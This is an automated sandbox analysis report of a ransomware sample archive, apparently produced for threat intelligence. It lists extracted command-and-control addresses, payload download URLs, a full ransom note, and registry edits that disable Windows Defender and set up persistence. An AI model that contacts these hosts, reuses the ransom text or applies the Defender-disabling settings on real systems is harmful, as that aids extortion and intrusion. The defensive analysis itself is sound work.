Analysis
-
max time kernel
85s -
max time network
269s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2024 11:24
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00459.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00459.7z
-
Size
126.6MB
-
MD5
d32547cac8d53badfce92595bf5429ab
-
SHA1
b49d003b7ca12891896c12c9af5a9234ab4e25c5
-
SHA256
ec65f2773a40d9d8b1551818e7d41044ad8fae1b6a7cc4861ff9d541d27c2c68
-
SHA512
4bd12da84599e7d26103a2994df7d5d12b6855e66bba97832da59d7a04e8320c6687c07071437a4d6b25877be4a3a075b2a5dc8eeb59e3578889850d38cc2767
-
SSDEEP
3145728:+ri4HHjY3N/F8fWqd8N2zdoetwXT0NUWNrZ67R2JWm5t:qi4clF8fACtwXoNUe6l2J7t
Malware Config
Extracted
C:\Program Files\Crashpad\reports\HOW TO RESTORE YOUR FILES.TXT
https://tox.chat/
Extracted
redline
PUB
185.215.113.45:41009
Extracted
djvu
http://astdg.top/fhsgtsspen6/get.php
-
extension
.nooa
-
offline_id
PLtnD1U6oAmgxgJ2nJik1mY9SwUQg07CiN0zSet1
-
payload_url
http://securebiz.org/dl/build2.exe
http://astdg.top/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CnI3tI6Ktv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0322gDrgo
Extracted
asyncrat
0.5.7B
Default
66.154.122.230:1337
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
Windows Logon.exe
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
MeowPC
74.81.52.179:2610
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
Extracted
njrat
im523
4
rlawlsl154.codns.com:443
a695e871b7f2f081334e678e67df6a28
-
reg_key
a695e871b7f2f081334e678e67df6a28
-
splitter
|'|'|
Extracted
C:\Program Files\Common Files\DESIGNER\!! READ ME !!.txt
http://cuba4mp6ximo2zlo.onion/
Signatures
-
Detected Djvu ransomware 15 IoCs
resource yara_rule behavioral1/memory/5960-618-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5960-631-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5192-704-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5192-767-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6044-917-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6044-915-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5960-946-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6044-951-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6044-952-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6044-955-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5960-1212-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6544-1341-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6544-1338-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6544-1410-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6544-1409-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detecting the common Go functions and variables names used by Snatch ransomware 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cb4-313.dat family_snatch -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023d26-284.dat elysiumstealer_dll -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" svchost.exe -
Raccoon Stealer V1 payload 1 IoCs
resource yara_rule behavioral1/memory/4364-543-0x0000000000400000-0x0000000003290000-memory.dmp family_raccoon_v1 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/memory/5336-564-0x0000000005300000-0x000000000531E000-memory.dmp family_redline behavioral1/memory/5336-563-0x0000000005150000-0x0000000005170000-memory.dmp family_redline behavioral1/files/0x000c00000001e430-1894.dat family_redline -
SectopRAT payload 3 IoCs
resource yara_rule behavioral1/memory/5336-564-0x0000000005300000-0x000000000531E000-memory.dmp family_sectoprat behavioral1/memory/5336-563-0x0000000005150000-0x0000000005170000-memory.dmp family_sectoprat behavioral1/files/0x000c00000001e430-1894.dat family_sectoprat -
Snatch Ransomware
Ransomware family generally distributed through RDP bruteforce attacks.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\windlogon.exe = "0" windlogon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\svchost.exe = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths windlogon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe = "0" windlogon.exe -
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/files/0x0007000000023d63-534.dat Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6672 powershell.exe 7692 powershell.exe 1680 powershell.exe 5660 powershell.exe 5980 powershell.exe 5716 powershell.exe 6428 powershell.exe 6452 powershell.exe 5852 powershell.exe 5692 powershell.exe 5912 powershell.exe 7772 powershell.exe 8944 powershell.exe 6524 powershell.exe 3036 powershell.exe 5840 powershell.exe 6440 powershell.exe 6528 powershell.exe 6432 powershell.exe 4256 powershell.exe 5828 powershell.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 7152 netsh.exe 3384 netsh.exe 9072 netsh.exe -
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation svhost.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Installer.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Installer.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation owxJMykQ.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation windlogon.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.exe Client.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.exe Client.exe -
Executes dropped EXE 47 IoCs
pid Process 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 3660 HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe 4204 HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe 3864 HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe 396 HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe 3704 Installer.exe 1428 owxJMykQ.exe 4364 HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exe 4664 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe 1456 HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe 2612 Installer.exe 2416 HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe 1884 svhost.exe 4016 HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exe 4208 windlogon.exe 2452 svchost.exe 2288 Regen.exe 2952 flood.exe 4228 HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe 3292 ResHacker-RH.exe 5004 HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe 5156 flood.exe 5336 HEUR-Trojan-Ransom.Win32.Stop.gen-3c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e.exe 5704 Client.exe 5736 HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe 6064 AdvancedRun.exe 1560 AdvancedRun.exe 3852 HEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exe 5668 HEUR-Trojan.MSIL.Crypt.gen-06a2b3dae21085aa5cad1105ec7ae822e4e785c1adf314e3554d515474a322f4.exe 5420 AdvancedRun.exe 5960 HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe 5568 AdvancedRun.exe 5136 HEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exe 5492 HEUR-Trojan.MSIL.Crypt.gen-21903a861055a5164a0b7ac7b6383006aa3f74308c2cc0891e5815f0e5d72643.exe 5192 HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe 5352 Tempdii3doe243v.exe 2948 HEUR-Trojan.MSIL.Crypt.gen-289140818ac1de3e47b318c226b66b92c782402123480f09cc35fc7e80e4291d.exe 6216 HEUR-Trojan.MSIL.Crypt.gen-30b1a884738e4fc2f2c2e0037be1be4783042022742acd496995cde5414250b6.exe 6476 svchost.exe 6672 windlogon.exe 6660 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe 6688 HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe 7028 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe 7136 HEUR-Trojan.MSIL.Crypt.gen-4b2e90180682a594c32e5d6e8b5c93f3263551058d589171cc89a1a8ad55eec9.exe 3664 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe 5176 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe -
Loads dropped DLL 7 IoCs
pid Process 3864 HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe 5156 flood.exe 5156 flood.exe 5156 flood.exe 5156 flood.exe 5156 flood.exe 5156 flood.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6380 icacls.exe -
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\windlogon.exe = "0" windlogon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\svchost.exe = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths windlogon.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions windlogon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe = "0" windlogon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" svchost.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fupdate = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\RfC2V8H28d5fbV = "C:\\Windows\\Resources\\Themes\\aero\\Shell\\UT6x3fc5xmgM3c\\svchost.exe" windlogon.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\C1R925c6F7Os6P6 = "C:\\Windows\\Resources\\Themes\\aero\\Shell\\D90ffqe921ShG36\\svchost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b351eab5-39c4-48ee-ace2-59e7c7649d95\\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe\" --AutoStart" HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\11f86284 = "C:\\Users\\Admin\\AppData\\Local\\Route0\\route.exe" HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ichrome = "C:\\Windows\\System32\\ichrome.exe" HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs
flow ioc 69 iplogger.org 77 iplogger.org 90 iplogger.org 119 iplogger.org 51 iplogger.org 68 iplogger.org 79 iplogger.org 91 iplogger.org 64 iplogger.org 50 iplogger.org 62 iplogger.org 81 iplogger.org 118 iplogger.org 192 raw.githubusercontent.com 49 iplogger.org 191 raw.githubusercontent.com 78 iplogger.org -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 214 icanhazip.com 40 api.2ip.ua 43 api.2ip.ua 45 api.2ip.ua 63 api.2ip.ua 100 api.2ip.ua -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000200000001e631-7932.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\WINDOWS\SysWOW64\ichrome.exe HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe File opened for modification C:\WINDOWS\SysWOW64\ichrome.exe HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5004 set thread context of 5960 5004 HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe 171 PID 5736 set thread context of 5192 5736 HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe 174 PID 2452 set thread context of 6476 2452 svchost.exe 222 PID 4208 set thread context of 6672 4208 windlogon.exe 620 PID 6660 set thread context of 7028 6660 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe 197 PID 7028 set thread context of 5176 7028 HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe 204 -
resource yara_rule behavioral1/files/0x0007000000023cb2-306.dat upx behavioral1/memory/4664-308-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0007000000023d39-366.dat upx behavioral1/memory/4664-568-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x000600000001ed2a-2047.dat upx behavioral1/files/0x0007000000023cee-3034.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\fur.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\7-Zip\7-zip32.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\7-Zip\7z.sfx.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\7-Zip\7zG.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7z.sfx HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\Crashpad\attachments\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\History.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\MEIPreload\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\History.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Google\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Google\Chrome\Application\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt.zdpnsa 